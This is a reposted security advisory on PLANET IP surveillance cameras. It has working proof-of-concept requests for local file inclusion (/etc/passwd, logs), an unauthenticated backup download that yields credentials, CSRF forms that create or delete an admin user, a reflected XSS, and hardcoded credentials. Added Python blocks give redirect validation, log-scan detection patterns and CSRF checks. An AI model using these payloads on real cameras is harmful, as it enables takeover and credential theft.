1337_Brain

PLANET Technology IP Surveillance Cameras - Multiple Vulnera

Apr 8th, 2016
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/

Security Advisory
2016-04-06 www.orwelllabs.com
Twitter: @orwelllabs

mantra: ...not affect a product that is in scope for... AhHum!



Overview
========
Technical Risk: high
Likelihood of Exploitation: medium
Credits: Discovered and researched by Orwelllabs
CVE-Number: N/A
DWF: Submitted
Advisory URL:
http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html
[1]

  27.  
Issues
======
I. Local File Inclusion (42 vectors)
II. Arbitrary file read/Authentication bypass
III. Sensitive information disclosure
IV. Cross-site request forgery
V. Reflected Cross-site scripting
VI. Hardcoded credentials

  37.  
I. Local File Inclusion
=======================
* CLASS: External Control of File Name or Path [CWE-73]

The web management interface of the PLANET IP surveillance camera models
FW-ICA-2500, ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V and
ICA-8350 (and probably others) is prone to Local File Inclusion (LFI).
  47.  
  48.  
PoC
---
The request below is generated when a new user is added; in this case
we are adding the following administrative credential for the cam:
"root:r00tx".

GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
Host: {xxx.xxx.xxx.xxx}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
Authorization: Basic YdRRtXW41YXRtad4=
Connection: keep-alive
If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT


If the value of the "redirect" parameter is changed to any system file,
the response will contain the contents of that file, as shown below:
http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd

In this case the content of /etc/passwd is retrieved.
  76.  
Vectors:
--------
There are a total of 42 LFI vectors; the detailed results will be
published on www.orwelllabs.com [1] soon.
Basically, all of the camera menus (shown below) used to submit, add,
modify and remove settings trigger the corresponding scripts, and each
of these scripts accepts a "redirect" parameter which is also affected.

[ ------------------------------ ]
[ #1: Network ------------------ ] -> 9
[ #2: Camera ------------------- ] -> 3
[ #3: System ------------------- ] -> 2
[ #4: Video -------------------- ] -> 4
[ #5: Audio -------------------- ] -> 1
[ #6: User --------------------- ] -> 1
[ #7: Protocol ----------------- ] -> 2
[ #8: E-Mail ------------------- ] -> 1
[ #9: Event Detection ---------- ] -> 1
[ #10: Storage ----------------- ] -> 2
[ #11: Continuous Recording ---- ] -> 1
[ #12: Recording List ---------- ] -> 0
[ #13: Event Server ------------ ] -> 11
[ #14: Event Schedule ---------- ] -> 4
[ ----------+------------------- ]
  102.  
  103.  
  104.  
II. Arbitrary file read/Authentication bypass
=============================================
The camera offers a feature to download its settings as a backup file.
However, because access control is not effective, this file remains
accessible via the browser to an unauthenticated user.

PoC
---
wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
tar -xzvf backup.tar.gz
cat tmp/sysConfig/sysenv.cfg | strings | fmt | cut -f8,9 -d" "

This returns the credential used to access the camera.

Through this vulnerability a user can also obtain the credential of the AP
to which the camera is connected, simply by parsing the file
'tmp/sysConfig/extra.info'.
  123.  
  124.  
III. Sensitive information disclosure
=====================================
Using the LFI vulnerability reported above, a user can obtain sensitive
information such as the username and password by reading the log file,
as follows:

{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages
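
Sections I to III share one defensive picture: a "redirect" parameter that the CGI scripts treat as a file path, and a backup archive served without authentication. The following Python, added here as an example and not part of the advisory or of PLANET's firmware, shows the allowlist check such a parameter needs and a scan of web-server access-log lines for both patterns. The allowlist of pages, the combined-style log format and the log lines themselves are constructed assumptions for the demonstration.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Pages a usrgrp.cgi-style script may legitimately bounce back to after a
# change. The set is an assumption: the camera's real page list is not known.
REDIRECT_ALLOWLIST = {"asp/user.asp", "asp/network.asp", "asp/system.asp"}


def redirect_is_safe(value: str) -> bool:
    """Accept only an allowlisted, already-normalised relative page path.

    Rejects absolute paths (/etc/passwd), traversal (asp/../../etc/shadow),
    scheme-prefixed values (open redirect), backslashes and NUL bytes.
    """
    if not value or value.startswith("/") or "\\" in value or "\x00" in value:
        return False
    if urlsplit(value).scheme:          # e.g. http://example.com/
        return False
    # normpath collapses "asp/../../etc/shadow" to "../etc/shadow"; requiring
    # the normalised form to equal the input means nothing with ".." matches.
    return posixpath.normpath(value) == value and value in REDIRECT_ALLOWLIST


# Constructed "combined"-style access-log lines modelled on the requests in
# this advisory; addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '10.0.0.5 - root [08/Apr/2016:10:01:02 +0000] "GET /cgi-bin/admin/usrgrp.cgi'
    '?user=bob&pwd=REDACTED&grp=viewer&sgrp=&action=add&redirect=asp%2Fuser.asp HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Apr/2016:10:02:11 +0000] "GET /cgi-bin/admin/usrgrp.cgi'
    '?user=&pwd=&grp=&sgrp=&action=&redirect=/etc/passwd HTTP/1.1" 200 1337',
    '10.0.0.9 - - [08/Apr/2016:10:02:40 +0000] "GET /backup.tar.gz HTTP/1.1" 200 84211',
    '10.0.0.7 - admin [08/Apr/2016:10:03:05 +0000] "GET /cgi-bin/admin/usrgrp.cgi'
    '?user=bob&pwd=REDACTED&grp=viewer&sgrp=&action=add&redirect=asp%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 900',
    '10.0.0.5 - root [08/Apr/2016:10:04:00 +0000] "GET /backup.tar.gz HTTP/1.1" 200 84211',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def scan_access_log(lines):
    """Return (ip, finding, detail) tuples for two patterns: a 'redirect'
    value outside the allowlist, and a successful download of backup.tar.gz
    by a client the server did not authenticate (user field '-')."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        query = parse_qs(parts.query, keep_blank_values=True)
        redirect = query.get("redirect", [None])[0]
        if redirect is not None and not redirect_is_safe(redirect):
            findings.append((m["ip"], "lfi-redirect", redirect))
        if (parts.path == "/backup.tar.gz" and m["status"] == "200"
                and m["user"] == "-"):
            findings.append((m["ip"], "unauth-backup-download", parts.path))
    return findings


if __name__ == "__main__":
    for ip, kind, detail in scan_access_log(SAMPLE_LOG):
        print(f"{ip:<10} {kind:<24} {detail}")
```

Because this interface carries credentials in the query string (pwd=...), the scanner reports only the redirect value and the path, never the whole request line. The allowlist check is the fix on the device side; the log scan is what a network owner can do today, since the "redirect" value is visible in any reverse-proxy or IDS log in front of the camera.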
  131.  
  132.  
IV. Cross-site request forgery
==============================
Planet IP cams ICA-* are prone to multiple CSRF.

PoC
---

- This will create an admin credential: root:r00tx

<html>
<!-- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- ICA-5350V

<html>
<!-- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- Delete user root

<html>
<!-- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
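
The checks a settings endpoint such as usrgrp.cgi would need in order to reject the forms above, written as an added Python example; this is not PLANET firmware code and not from the advisory. The server key, session id, camera address 192.0.2.10 and the three request bodies are constructed for the demonstration.

```python
import hmac
import hashlib
import secrets
from urllib.parse import parse_qs, urlsplit

# Hypothetical per-device secret; real firmware would generate and persist
# one at first boot rather than ship a constant.
SERVER_KEY = secrets.token_bytes(32)

# usrgrp.cgi-style "action" values that change state and therefore need
# CSRF protection; read-only actions pass through.
STATE_CHANGING_ACTIONS = {"add", "remove", "modify"}


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Derive the token the settings page embeds as a hidden form field.
    Binding it to the session means a page on another origin cannot know it."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body or query string."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def check_state_change(method, headers, form, session_id, expected_host,
                       key=SERVER_KEY):
    """Return (allowed, reason) for a request to a settings endpoint.

    Three independent checks, any one of which stops the forms in this
    advisory: state changes must be POSTed (a link or GET form cannot
    trigger them), the Origin/Referer must be the camera itself, and the
    request must carry the session-bound token.
    """
    if form.get("action") not in STATE_CHANGING_ACTIONS:
        return True, "read-only request"
    if method != "POST":
        return False, "state change must use POST, not GET"
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin or urlsplit(origin).netloc != expected_host:
        return False, "missing or foreign Origin/Referer"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id, key)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: the camera sits at 192.0.2.10 (documentation range)
# and the victim's browser holds session "sess-1".
CAMERA_HOST = "192.0.2.10"
SESSION = "sess-1"

FORGED_GET = dict(            # shape of the GET forms quoted above
    method="GET",
    headers={"Referer": "http://example.com/csrf.html"},
    form=parse_form("user=root&pwd=REDACTED&grp=administrator&sgrp=ptz&action=add"),
)
FORGED_POST = dict(           # same submission forced to POST, still foreign
    method="POST",
    headers={"Origin": "http://example.com"},
    form=parse_form("user=root&pwd=REDACTED&grp=administrator&sgrp=ptz&action=add"),
)
GENUINE_POST = dict(          # submitted from the camera's own settings page
    method="POST",
    headers={"Origin": f"http://{CAMERA_HOST}"},
    form=parse_form("user=bob&pwd=REDACTED&grp=viewer&sgrp=&action=add&csrf_token="
                    + issue_csrf_token(SESSION)),
)


def demo():
    """Evaluate the three constructed requests; returns their verdicts."""
    return [check_state_change(session_id=SESSION, expected_host=CAMERA_HOST, **r)
            for r in (FORGED_GET, FORGED_POST, GENUINE_POST)]


if __name__ == "__main__":
    for (ok, why), name in zip(demo(), ("forged GET", "forged POST", "genuine POST")):
        print(f"{name:<13} {'allowed' if ok else 'blocked':<8} {why}")
```

The request captured in section I shows the camera relying on HTTP Basic authentication. Browsers resend Basic credentials on every request to that host automatically, so being authenticated says nothing about which page originated the request; that is exactly why the endpoint needs a token it issued itself, not just a valid Authorization header.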
  175.  
  176.  
V. Cross-Site Scripting
=======================
Camera models ICA-* are prone to multiple XSS.

PoC
---
http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>

This will pop up the message "XSS" in the browser.
  186.  
  187.  
VI. Hardcoded credentials
=========================

The credentials of the web management interface can be found just by
viewing the source of the page default_nets.htm:

PoC
---
https://{xxx.xxx.xxx.xxx}/default_nets.htm

code:

// excerpt of default_nets.htm; the leading brace closes a function not shown
}

function av_onload(){
    CheckMobileMode();
    util_SetUserInfo();
    Loadplay();
    watchdog();
    //alert("watchdog");
}
function Loadplay(){
    play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
}
  212.  
  213.  
Vulnerable Packages
===================
ICA-2500
ICA-2250VT
ICA-4200V
ICA-4500V
ICA-3350V
ICA-5350V
ICA-8350
  223.  
  224.  
  225.  
Timeline
========
2015-10-02 - Issues discovered
2015-11-30 - Vendor contacted (advisory sent)
2015-12-16 - Vendor contacted (asking for feedback about reported issues)
2015-12-17 - Vendor response (asking for more time to check issues)
2015-12-21 - RD team replied: can't duplicate vulnerabilities....
2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
             persist and can be reproduced.)
...and no news after that...